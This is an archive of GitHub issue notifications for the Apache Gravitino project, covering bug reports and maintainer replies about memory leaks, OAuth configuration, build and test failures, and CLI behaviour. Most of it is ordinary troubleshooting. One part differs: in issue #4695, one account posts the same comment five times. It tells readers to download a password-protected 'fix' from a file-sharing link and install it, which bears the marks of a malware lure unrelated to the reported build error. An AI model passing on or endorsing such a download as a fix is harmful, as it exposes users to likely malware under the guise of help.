Re: [I] [Bug report] Gravitino will OOM when alter Iceberg catalog several times [gravitino]

2025-07-23 Thread via GitHub
yuqi1129 commented on issue #7370: URL: https://github.com/apache/gravitino/issues/7370#issuecomment-3111643242 It seems that the Paimon catalog also shares the same problem. The following is a dump analysis of objects for the Paimon catalog. When we repeatedly modify Paimon catalog, the c

[I] [Bug report] [gravitino]

2025-07-08 Thread via GitHub
liunaijie opened a new issue, #7618: URL: https://github.com/apache/gravitino/issues/7618 ### Version main branch ### Describe what's wrong version: 0.9.0-incubating env: gravitino playground I create a hive table on cli. the comment using chinese. https:

Re: [I] [Bug report] Gravitino OAuth doesn't work with dynamic config provider [gravitino]

2025-07-01 Thread via GitHub
jerqi closed issue #7427: [Bug report] Gravitino OAuth doesn't work with dynamic config provider URL: https://github.com/apache/gravitino/issues/7427 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to

Re: [I] [Bug report] Gravitino core jcstress jar should not be in libs folder [gravitino]

2025-06-25 Thread via GitHub
jerryshao closed issue #7465: [Bug report] Gravitino core jcstress jar should not be in libs folder URL: https://github.com/apache/gravitino/issues/7465 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go

[I] [Bug report] Gravitino core jcstress jar should not be in libs folder [gravitino]

2025-06-24 Thread via GitHub
jerryshao opened a new issue, #7465: URL: https://github.com/apache/gravitino/issues/7465 ### Version main branch ### Describe what's wrong The Gravitino core jcstress jar is now in `libs` folder, which is unwanted: https://github.com/user-attachments/assets/b5695d

Re: [I] [Bug report] Gravitino OAuth doesn't work with dynamic config provider [gravitino]

2025-06-18 Thread via GitHub
FANNG1 commented on issue #7427: URL: https://github.com/apache/gravitino/issues/7427#issuecomment-2986528619 @bharos propose #7434 to add oauth support for dynamic config provider, please take a look when you have time, thanks. -- This is an automated message from the Apache Git Service.

Re: [I] [Bug report] Gravitino OAuth doesn't work with dynamic config provider [gravitino]

2025-06-17 Thread via GitHub
FANNG1 commented on issue #7427: URL: https://github.com/apache/gravitino/issues/7427#issuecomment-2982895104 Thanks @bharos for reporting this, the main reason is Iceberg REST server doesn't support using OAuth to retrieve Iceberg catalog information from the Gravitino server when using `d

[I] [Bug report] Gravitino OAuth doesn't work with dynamic config provider [gravitino]

2025-06-17 Thread via GitHub
bharos opened a new issue, #7427: URL: https://github.com/apache/gravitino/issues/7427 ### Version main branch ### Describe what's wrong I have to use static-config-provider to use OAuth. Not sure why but doesn't work well with dynamic-config-provider ### Error me

Re: [I] [Bug report] Gravitino will OOM when alter Iceberg catalog several times [gravitino]

2025-06-15 Thread via GitHub
yuqi1129 commented on issue #7370: URL: https://github.com/apache/gravitino/issues/7370#issuecomment-2974872481 @kaori-seasons , Thanks for your hard work on this issue, your kind suggestion is really valuable for solving this issue on the ground. Based on my previous knowled

Re: [I] [Bug report] Gravitino will OOM when alter Iceberg catalog several times [gravitino]

2025-06-13 Thread via GitHub
kaori-seasons commented on issue #7370: URL: https://github.com/apache/gravitino/issues/7370#issuecomment-2972351246 ClassLoader resource isolation solution Core Optimization Strategy Based on the analysis of CatalogManager.java:957-983, the root cause of the problem is that each

Re: [I] [Bug report] Gravitino will OOM when alter Iceberg catalog several times [gravitino]

2025-06-13 Thread via GitHub
kaori-seasons commented on issue #7370: URL: https://github.com/apache/gravitino/issues/7370#issuecomment-2972319655 @yuqi1129 The root cause of this Metaspace OOM error is that the IsolatedClassLoader instance is not released in time during the high-frequency catalog attribute update op

Re: [I] [Bug report] Gravitino will OOM when alter Iceberg catalog several times [gravitino]

2025-06-10 Thread via GitHub
yuqi1129 commented on issue #7370: URL: https://github.com/apache/gravitino/issues/7370#issuecomment-2959959137 It appears that the unused class loader cannot be cleaned. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and us

[I] [Bug report] Gravitino will OOM when alter Iceberg catalog serveral times [gravitino]

2025-06-10 Thread via GitHub
yuqi1129 opened a new issue, #7370: URL: https://github.com/apache/gravitino/issues/7370 ### Version main branch ### Describe what's wrong ➜ [/Users/yuqi/Downloads] while [[ 1 -eq 1 ]] do curl -X PUT -H "Accept: application/vnd.gravitino.v1+json" \ -H "Content-T

Re: [I] [Bug report] gravitino-server.out file has error: ERROR No age provided for IfLastModified [gravitino]

2025-04-29 Thread via GitHub
jerqi closed issue #7109: [Bug report] gravitino-server.out file has error: ERROR No age provided for IfLastModified URL: https://github.com/apache/gravitino/issues/7109 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the

Re: [I] [Bug report] gravitino-server.out file has error: ERROR No age provided for IfLastModified [gravitino]

2025-04-29 Thread via GitHub
FANNG1 commented on issue #7109: URL: https://github.com/apache/gravitino/issues/7109#issuecomment-2840547517 fixed by https://github.com/apache/gravitino/pull/7070 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the U

Re: [I] [Bug report] gravitino-server.out file has error: ERROR No age provided for IfLastModified [gravitino]

2025-04-29 Thread via GitHub
jerqi commented on issue #7109: URL: https://github.com/apache/gravitino/issues/7109#issuecomment-2838743777 cc @FANNG1 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To

[I] [Bug report] gravitino-server.out has error: ERROR No age provided for IfLastModified [gravitino]

2025-04-29 Thread via GitHub
danhuawang opened a new issue, #7109: URL: https://github.com/apache/gravitino/issues/7109 ### Version main branch ### Describe what's wrong ``` 2025-04-29T12:22:51.625346635Z main ERROR No age provided for IfLastModified 2025-04-29T12:22:51.627329652Z main ERROR Co

Re: [I] [Bug report] gravitino-server.out file has error: ERROR No age provided for IfLastModified [gravitino]

2025-04-29 Thread via GitHub
danhuawang commented on issue #7109: URL: https://github.com/apache/gravitino/issues/7109#issuecomment-2838707293 @jerqi Can you help check this issue? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to g

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
shaofengshi commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2635996460 This test case assert that it will throw a ConnectException when connecting to address "hdfs://localhost:9000/user1". While, if there is such a HDFS service running in the same

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
youngyjd commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2635864586 Tried to get `exception.getCause().getClass().getName()`. It returned me `java.io.EOFException` https://github.com/user-attachments/assets/d2a80e9e-6fb2-4f00-a9c4-1014e203e5

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
yuqi1129 commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2635855803 I am unable to reproduce in this environment. ``` (venv) ➜ [/Users/yuqi/project/gravitino] git:(issue_6380) java --version openjdk 11.0.22 2024-01-16 LTS OpenJDK Ru

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
youngyjd commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2635852535 I didn't find more error message. I even tried openjdk 17 but saw the same error ``` 2025-02-04T23:00:26.484-0800 [DEBUG] [TestEventLogger] TestHadoopCatalogOperations >

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
shaofengshi commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2635606698 I wasn't able to reproduce, with the same jdk version; my gradle version is newer (8.9) but I don't think that's the reason. @youngyjd do you have more error or warning message

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
yuqi1129 commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2633634939 I see and will take the time to work on this issue. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the UR

Re: [I] [Bug report] Gravitino default JVM config mismatches with comments from gravitino-env.sh [gravitino]

2025-02-04 Thread via GitHub
yuqi1129 closed issue #6384: [Bug report] Gravitino default JVM config mismatches with comments from gravitino-env.sh URL: https://github.com/apache/gravitino/issues/6384 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use th

Re: [I] [Bug report] [gravitino]

2025-02-04 Thread via GitHub
jerryshao commented on issue #6390: URL: https://github.com/apache/gravitino/issues/6390#issuecomment-2633472050 Thanks @youngyjd , @yuqi1129 will you please help to check this problem when you have time? Thanks. -- This is an automated message from the Apache Git Service. To respond to t

[I] [Bug report] [gravitino]

2025-02-03 Thread via GitHub
youngyjd opened a new issue, #6390: URL: https://github.com/apache/gravitino/issues/6390 ### Version main branch ### Describe what's wrong `./gradlew test -PskipITs` failed to run `Task :catalogs:catalog-hadoop:test` My java env ``` openjdk 11.0.25 2024-10-15

[I] [Bug report] Gravitino default JVM config mismatches with comments from gravitino-env.sh [gravitino]

2025-01-29 Thread via GitHub
puchengy opened a new issue, #6384: URL: https://github.com/apache/gravitino/issues/6384 ### Version main branch ### Describe what's wrong https://github.com/apache/gravitino/blob/09d4e64fac9fc2a0d5fdf9304d2e4a0b1f8fdb6f/conf/gravitino-env.sh.template#L31 from `gravitin

Re: [I] [Bug report] Gravitino REST Server Defaults to 'jdbc' Instead of Using Catalog Name from Spark Configuration [gravitino]

2025-01-22 Thread via GitHub
dataageek commented on issue #6310: URL: https://github.com/apache/gravitino/issues/6310#issuecomment-2606980604 hi @FANNG1 Could you please let me know if there is a workaround for this issue in Spark? -- This is an automated message from the Apache Git Service. To respond to the message

Re: [I] [Bug report] Gravitino REST Server Defaults to 'jdbc' Instead of Using Catalog Name from Spark Configuration [gravitino]

2025-01-22 Thread via GitHub
FANNG1 commented on issue #6310: URL: https://github.com/apache/gravitino/issues/6310#issuecomment-2607036198 You mean the Iceberg catalog name in Iceberg REST server side is decided by the Spark client ? It seems a little odd, The catalog backend name is initiated when startup. -- This

[I] [Bug report] Gravitino REST Server Defaults to 'jdbc' Instead of Using Catalog Name from Spark Configuration [gravitino]

2025-01-16 Thread via GitHub
dataageek opened a new issue, #6310: URL: https://github.com/apache/gravitino/issues/6310 ### Version main branch ### Describe what's wrong I have multiple catalogs created using the Iceberg JDBC catalog. When I attempt to consume these catalogs via the Gravitino REST se

Re: [I] [Bug report] Gravitino sever starting error and all apis reponse nothing [gravitino]

2025-01-09 Thread via GitHub
jerryshao closed issue #5686: [Bug report] Gravitino sever starting error and all apis reponse nothing URL: https://github.com/apache/gravitino/issues/5686 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to

Re: [I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
yuqi1129 commented on issue #6156: URL: https://github.com/apache/gravitino/issues/6156#issuecomment-2577523221 > can you also help on the fileset and how to list after the fils in the bucket ? I'm having trouble understanding your words, could you provide more details? -- This is

Re: [I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
gesaleh commented on issue #6156: URL: https://github.com/apache/gravitino/issues/6156#issuecomment-2577519535 I found out it work if i gave the IP of container itself not the docker name can you also help on the fileset and how to list after the fils in the bucket ? Thanks

Re: [I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
gesaleh commented on issue #6156: URL: https://github.com/apache/gravitino/issues/6156#issuecomment-2577501523 can you give me more details about the copy aws-bundle to the Hadoop catalog classpath and start the Gravitino server ``` # ls gravitino* gravitino-api-0.7.0-incubating

Re: [I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
yuqi1129 commented on issue #6156: URL: https://github.com/apache/gravitino/issues/6156#issuecomment-2577345213 @gesaleh It's okay for me to connect to Minio: ``` (venv-spark-3.1) ➜ [/Users/yuqi] curl -X POST -H "Accept: application/vnd.gravitino.v1+json" \ -H "Content-

Re: [I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
yuqi1129 commented on issue #6156: URL: https://github.com/apache/gravitino/issues/6156#issuecomment-2576998297 @gesaleh Thank you for reporting this issue. We will promptly follow up. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to

[I] [Bug report] [gravitino]

2025-01-08 Thread via GitHub
gesaleh opened a new issue, #6156: URL: https://github.com/apache/gravitino/issues/6156 ### Version main branch ### Describe what's wrong S3 hadoop integration configuration minio runing in a docker bucket created work playground docker deployment with same

Re: [I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-31 Thread via GitHub
justinmclean closed issue #6027: [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option URL: https://github.com/apache/gravitino/issues/6027 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and u

Re: [I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-31 Thread via GitHub
justinmclean closed issue #6027: [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option URL: https://github.com/apache/gravitino/issues/6027 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and u

Re: [I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-29 Thread via GitHub
justinmclean commented on issue #6027: URL: https://github.com/apache/gravitino/issues/6027#issuecomment-2564923624 This is the correct behaviour as you should always set the metalake in one of the 3 ways describe in the documentation. We should print out an error message if the metlake nam

Re: [I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-28 Thread via GitHub
Abyss-lord commented on issue #6027: URL: https://github.com/apache/gravitino/issues/6027#issuecomment-2564587856 @justinmclean , I would like to work on it. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL abov

Re: [I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-27 Thread via GitHub
luoshipeng commented on issue #6027: URL: https://github.com/apache/gravitino/issues/6027#issuecomment-2563566035 sorry, i forgot paste server log ![image](https://github.com/user-attachments/assets/1a7cea7f-4879-4513-b10b-7b0c1e63fb45) -- This is an automated message from the Apac

[I] [Bug report] Gravitino CLI get wrong catalogName when set metalake name by --name option [gravitino]

2024-12-27 Thread via GitHub
luoshipeng opened a new issue, #6027: URL: https://github.com/apache/gravitino/issues/6027 ### Version main branch ### Describe what's wrong when i use gcli command, if i set `--name` option value to `lsp_test.mysql_test.test_db`, it uses part[0] as both the metalakeName

Re: [I] [Bug report] Gravitino trino-connector drop catalog will cause Trino Coordinator OOM [gravitino]

2024-12-10 Thread via GitHub
maomaodev commented on issue #5804: URL: https://github.com/apache/gravitino/issues/5804#issuecomment-2533471056 您好,我是毛立夫。 您的邮件已收到。 祝您生活愉快,身体健康! -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go

Re: [I] [Bug report] Gravitino trino-connector drop catalog will cause Trino Coordinator OOM [gravitino]

2024-12-10 Thread via GitHub
diqiu50 commented on issue #5804: URL: https://github.com/apache/gravitino/issues/5804#issuecomment-2533470563 This issue is caused by the resource release triggered by the Trino `DROP CATALOG` command. For more information, refer tohttps://trino.io/docs/current/admin/properties-catalog.htm

[I] [Bug report] Gravitino trino-connector drop catalog will cause Trino Coordinator OOM [gravitino]

2024-12-09 Thread via GitHub
maomaodev opened a new issue, #5804: URL: https://github.com/apache/gravitino/issues/5804 ### Version main branch ### Describe what's wrong In order to have real-time awareness of configuration changes like hdfs-site.xml, we periodically update the Catalog's lastModified

[I] [Bug report] [gravitino]

2024-12-04 Thread via GitHub
an-shi-chi-fan opened a new issue, #5765: URL: https://github.com/apache/gravitino/issues/5765 ### Version main branch ### Describe what's wrong I deployed a set of gravtino-0.7.0 and used my own frontend service to interface with gravtino's HTTP request client. When I m

Re: [I] [Bug report] Gravitino sever starting error and all apis reponse nothing [gravitino]

2024-12-02 Thread via GitHub
jerryshao commented on issue #5686: URL: https://github.com/apache/gravitino/issues/5686#issuecomment-2513782320 @yujiantao Did you build or modify Gravitino yourself, how can we reproduce this issue? -- This is an automated message from the Apache Git Service. To respond to the message,

[I] [Bug report] gravitino sever starting error and all apis reponse nothing [gravitino]

2024-11-26 Thread via GitHub
yujiantao opened a new issue, #5686: URL: https://github.com/apache/gravitino/issues/5686 ### Version main branch ### Describe what's wrong version: 0.7.0-incubating WEB-INF/lib/FastInfoset-1.2.15.jar is not found when gravitino server starts, and api responses no

Re: [I] [Bug report] gravitino poms say to expect gradle modules but they are not published [gravitino]

2024-11-13 Thread via GitHub
jerryshao closed issue #5535: [Bug report] gravitino poms say to expect gradle modules but they are not published URL: https://github.com/apache/gravitino/issues/5535 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the UR

Re: [I] [Bug report] gravitino poms say to expect gradle modules but they are not published [gravitino]

2024-11-11 Thread via GitHub
jerryshao commented on issue #5535: URL: https://github.com/apache/gravitino/issues/5535#issuecomment-2469519955 Let me fix this issue. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specifi

[I] [Bug report] gravitino poms say to expect gradle modules but they are not published [gravitino]

2024-11-11 Thread via GitHub
pjfanning opened a new issue, #5535: URL: https://github.com/apache/gravitino/issues/5535 ### Version main branch ### Describe what's wrong Spotted in 0.7.0 (RC) and in 0.6.1. https://repository.apache.org/content/groups/staging/org/apache/gravitino/meta/0.6.1-inc

Re: [I] [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container [gravitino]

2024-11-07 Thread via GitHub
mchades closed issue #5502: [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container URL: https://github.com/apache/gravitino/issues/5502 -- This is an automated message from the Apache Git Se

Re: [I] [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container [gravitino]

2024-11-07 Thread via GitHub
FANNG1 closed issue #5502: [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container URL: https://github.com/apache/gravitino/issues/5502 -- This is an automated message from the Apache Git Ser

Re: [I] [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container [gravitino]

2024-11-07 Thread via GitHub
FANNG1 commented on issue #5502: URL: https://github.com/apache/gravitino/issues/5502#issuecomment-2461983226 close it as not real enviroment. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to

Re: [I] [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container [gravitino]

2024-11-07 Thread via GitHub
danhuawang commented on issue #5502: URL: https://github.com/apache/gravitino/issues/5502#issuecomment-2461750539 @FANNG1 Can you help check this issue ? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to

[I] [Bug report] gravitino-iceberg-rest: "GRAVITINO_IO_IMPL","GRAVITINO_S3_ACCESS_KEY","GRAVITINO_S3_SECRET_KEY" environment variables didn't work in container [gravitino]

2024-11-07 Thread via GitHub
danhuawang opened a new issue, #5502: URL: https://github.com/apache/gravitino/issues/5502 ### Version main branch ### Describe what's wrong **When the storage is remote S3 storage** **Set the environment variables as following:** ``` # env GRAVITINO_S3_SE

Re: [I] [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null [gravitino]

2024-10-24 Thread via GitHub
mchades commented on issue #5237: URL: https://github.com/apache/gravitino/issues/5237#issuecomment-2436670018 will be fixed after #5241 merged -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the

Re: [I] [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null [gravitino]

2024-10-24 Thread via GitHub
jerryshao closed issue #5237: [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null URL: https://github.com/apache/gravitino/issues/5237 -- This is an automated message from the Apache Git Service. To respond

Re: [I] [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null [gravitino]

2024-10-24 Thread via GitHub
jerryshao closed issue #5237: [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null URL: https://github.com/apache/gravitino/issues/5237 -- This is an automated message from the Apache Git Service. To respond

Re: [I] [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null [gravitino]

2024-10-24 Thread via GitHub
danhuawang commented on issue #5237: URL: https://github.com/apache/gravitino/issues/5237#issuecomment-2434656567 @mchades Can you help check this issue? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to

[I] [Bug report] Gravitino container load metalake encounter: NullPointerException: Cannot invoke "java.util.Map.size()" because "m" is null [gravitino]

2024-10-24 Thread via GitHub
danhuawang opened a new issue, #5237: URL: https://github.com/apache/gravitino/issues/5237 ### Version main branch ### Describe what's wrong Run trino test failed. ``` ./trino_test.sh --auto=none --ignore_failed --postgresql_uri=jdbc:postgresql://pg-16-postgresql.r

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-02 Thread via GitHub
justinmclean commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2324097970 Closing this until I can reliably reproduce it -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-02 Thread via GitHub
justinmclean closed issue #4835: [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate URL: https://github.com/apache/gravitino/issues/4835 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL abo

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-02 Thread via GitHub
justinmclean commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323995406 The results are not always the same (even though they should be) I've run it several times and got a Python error (in the client-python:envSetup part) on 3 occasions, and it b

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-02 Thread via GitHub
mchades commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323973332 Have you verified the commands I provided above? Is the result still the same? -- This is an automated message from the Apache Git Service. To respond to the message, please log

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
justinmclean commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323950016 Yep as you say the jar is not in the source artifact. Perhaps what is happening is that jar is getting downloaded before the rat finishes its run and the rat is getting the er

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
mchades commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323940680 I doubt if you have any local directory files that haven't been cleared. Can you verify using this command? `rm -rf gravitino-0.6.0-incubating-src && rm -rf gravitino-0.6.0-

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
mchades commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323933944 > Ah, I found what the issue is, the source contains ./gradle/wrapper/gradle-wrapper.jar Sorry, I don't understand. Before running the command `./gradlew build`, the

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
justinmclean commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323906091 Ah, I found what the issue is, the source contains ./gradle/wrapper/gradle-wrapper.jar -- This is an automated message from the Apache Git Service. To respond to the message

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
justinmclean commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323894006 Here are the commands: 1. download gravitino-0.6.0-incubating-src.tar.gz from https://dist.apache.org/repos/dist/dev/incubator/gravitino/v0.6.0-incubating-rc5/ 2. Untar w

Re: [I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
mchades commented on issue #4835: URL: https://github.com/apache/gravitino/issues/4835#issuecomment-2323877283 Could you please provide the commands you used, like `wget xxx && tar xxx && cd xx && ./gradlew xxx`? -- This is an automated message from the Apache Git Service. To respond to

[I] [Bug report] Gravitino 0.6.0 rat test fails when checking release candidate [gravitino]

2024-09-01 Thread via GitHub
justinmclean opened a new issue, #4835: URL: https://github.com/apache/gravitino/issues/4835 ### Version main branch ### Describe what's wrong Download the 0.6.0 release artifact, untar, and try to compile and you get an error. ### Error message and/or stacktrace

Re: [I] [Bug report] Gravitino client and Gravitino server should be compatible with minor version differences [gravitino]

2024-08-27 Thread via GitHub
shaofengshi commented on issue #4707: URL: https://github.com/apache/gravitino/issues/4707#issuecomment-2313774329 It said: "Gravitino does not support the case that the client-side version is higher than the server-side version.The client version is 0.6.1-incubating-SNAPSHOT, and the serve

[I] [Bug report] Gravitino client and Gravitino server should be compatible with minor version differences [gravitino]

2024-08-27 Thread via GitHub
yuqi1129 opened a new issue, #4707: URL: https://github.com/apache/gravitino/issues/4707 ### Version main branch ### Describe what's wrong If the client version is 0.6.1 and the server version is 0.6.0, in this case, client should be compatible with server. the client s

Re: [I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
amir1387aht commented on issue #4695: URL: https://github.com/apache/gravitino/issues/4695#issuecomment-2311480489 to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a

Re: [I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
amir1387aht commented on issue #4695: URL: https://github.com/apache/gravitino/issues/4695#issuecomment-2311480480 to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a

Re: [I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
amir1387aht commented on issue #4695: URL: https://github.com/apache/gravitino/issues/4695#issuecomment-2311480431 to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a

Re: [I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
amir1387aht commented on issue #4695: URL: https://github.com/apache/gravitino/issues/4695#issuecomment-2311480378 to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a

Re: [I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
amir1387aht commented on issue #4695: URL: https://github.com/apache/gravitino/issues/4695#issuecomment-2311479486 to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a

[I] [Bug report] [gravitino]

2024-08-26 Thread via GitHub
FANNG1 opened a new issue, #4695: URL: https://github.com/apache/gravitino/issues/4695 ### Version main branch ### Describe what's wrong ./gradlew :clients:client-python:build failed if the package doesn't contain .git directory. ### Error message and/or stacktrac

Re: [I] [Bug report] Gravitino UI misleading repeated error message [gravitino]

2024-08-06 Thread via GitHub
jerryshao closed issue #2110: [Bug report] Gravitino UI misleading repeated error message URL: https://github.com/apache/gravitino/issues/2110 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the spe

Re: [I] [Bug report] Gravitino UI misleading repeated error message [gravitino]

2024-08-06 Thread via GitHub
jerryshao closed issue #2110: [Bug report] Gravitino UI misleading repeated error message URL: https://github.com/apache/gravitino/issues/2110 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the spe

Re: [I] [Bug report] Gravitino UI misleading repeated error message [gravitino]

2024-08-05 Thread via GitHub
LauraXia123 commented on issue #2110: URL: https://github.com/apache/gravitino/issues/2110#issuecomment-2268489590 I'll fix this issue. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specifi

Re: [I] [Bug report] Gravitino UI misleading repeated error message [gravitino]

2024-08-04 Thread via GitHub
jerryshao commented on issue #2110: URL: https://github.com/apache/gravitino/issues/2110#issuecomment-2268112121 @LauraXia123 please help to check this. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to

Re: [I] [Bug report] Gravitino-trino-connector don't work with Trino-435 worker [gravitino]

2024-08-01 Thread via GitHub
yuqi1129 closed issue #2428: [Bug report] Gravitino-trino-connector don't work with Trino-435 worker URL: https://github.com/apache/gravitino/issues/2428 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go

Re: [I] [Bug report] Gravitino-trino-connector don't work with Trino-435 worker [gravitino]

2024-08-01 Thread via GitHub
diqiu50 commented on issue #2428: URL: https://github.com/apache/gravitino/issues/2428#issuecomment-2262313696 It fix now -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To